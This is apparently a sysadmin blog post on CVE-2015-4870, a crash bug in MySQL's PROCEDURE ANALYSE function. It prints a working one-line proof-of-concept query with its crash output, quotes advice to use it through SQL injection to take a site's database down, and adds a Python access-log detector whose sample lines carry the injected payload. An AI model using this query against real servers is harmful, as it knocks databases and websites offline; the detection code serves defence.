Sysadmins of the North

MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

Sri Lankan security researcher Osanda Malith discovered a DoS (crash) vulnerability in MySQL's PROCEDURE ANALYSE function. The vulnerability crashes MySQL versions up to 5.5.45.

MySQL DoS/crash vulnerability details

Osanda Malith found this crash in the PROCEDURE ANALYSE() function when a subquery is passed to it. Its syntax:

SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an example proof of concept (POC) would be:

select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server
 
mysql>

On Windows, a single request crashes mysql.exe and an administrator has to restart the MySQL service manually. On *nix systems mysqld recovers automatically, but if an attacker keeps sending GET requests with this payload, the database keeps crashing.

Taking advantage (exploiting the crash bug)

Osanda Malith writes:

If you came across a website vulnerable to SQL injection, you can simply perform a DoS attack so that the MySQL server will not respond and the entire database of the website would be down, meaning the website will no longer be in an active state.
In Windows based systems in a single request the process will crash. We have to manually restart the MySQL server.

This sounds like a very nasty side effect of an SQL injection vulnerability. In August 2014 I wrote about MySQL sleep() attacks being carried out in the wild. There an attacker injects sleep(3) into a vulnerable web application, making mysqld sleep for the given number of seconds, possibly once for every record found, depending on where the sleep() is injected. That was a Denial of Service attack on the whole MySQL server, quickly consuming all available connections.


This crash/DoS vulnerability, however, requires only one request to crash mysql.exe on Windows Server, and a continuous stream of requests on Linux/Unix, because there the mysqld service recovers automatically.
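As an added example that is not part of the original post or of Osanda Malith's research: a small Python detector that walks web-server access log lines (Apache combined log format is assumed; the sample lines are constructed) and flags requests whose URL-decoded target carries the PROCEDURE ANALYSE subquery construct, counting hits per client IP so that the repeated attempts a *nix host needs stand out.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log lines (Apache combined format); not from the post.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2015:10:01:02 +0200] "GET /products.php?id=3 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Sep/2015:10:01:07 +0200] "GET /products.php?id=3%20procedure%20analyse((select*from(select%201)x),1) HTTP/1.1" 500 312 "-" "curl/7.43.0"
198.51.100.2 - - [10/Sep/2015:10:02:11 +0200] "GET /search.php?q=PROCEDURE+ANALYSE HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Sep/2015:10:01:09 +0200] "GET /products.php?id=3+PROCEDURE+ANALYSE((SELECT*FROM(SELECT+1)x),1) HTTP/1.1" 500 312 "-" "curl/7.43.0"
"""

# The construct from CVE-2015-4870: PROCEDURE ANALYSE called with a
# parenthesised sub-query as its first argument. A bare "PROCEDURE ANALYSE"
# string (e.g. someone searching for the term) does not match.
ANALYSE_SUBQUERY = re.compile(r"procedure\s+analyse\s*\(\s*\(\s*select\b", re.IGNORECASE)

# client IP, timestamp and request target of a combined-format log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+)')


def is_analyse_crash_attempt(request_target):
    """True if the URL-encoded request target carries the crash construct."""
    decoded = unquote_plus(request_target)  # handles %20 and '+' encodings
    return ANALYSE_SUBQUERY.search(decoded) is not None


def scan_access_log(log_text):
    """Return (client_ip, timestamp, decoded_target) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we can parse; skip
        ip, ts, target = m.groups()
        if is_analyse_crash_attempt(target):
            hits.append((ip, ts, unquote_plus(target)))
    return hits


def attackers_by_count(hits):
    """Hits per client IP, most active first; repeated senders are the ones
    that keep a self-recovering *nix mysqld down."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for ip, ts, target in found:
        print(f"{ts} {ip} {target}")
    print(attackers_by_count(found))
```

Feed it the real access log of the web application in front of the database (e.g. `scan_access_log(open(path).read())`); the per-IP counts are a starting point for blocking at the firewall or web server.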

Full MySQL Vulnerability details blog post

Read the full details in Osanda Malith’s blog post.

About the author: Jan Reilink

My name is Jan. I am not a hacker, coder, developer, programmer or guru. I am merely a system administrator, doing my daily thing at Vevida in the Netherlands. With over 15 years of experience, my specialties include Windows Server, IIS, Linux (CentOS, Debian), security, PHP, WordPress, websites & optimization. Want to support me and donate? Use this link: https://paypal.me/jreilink.
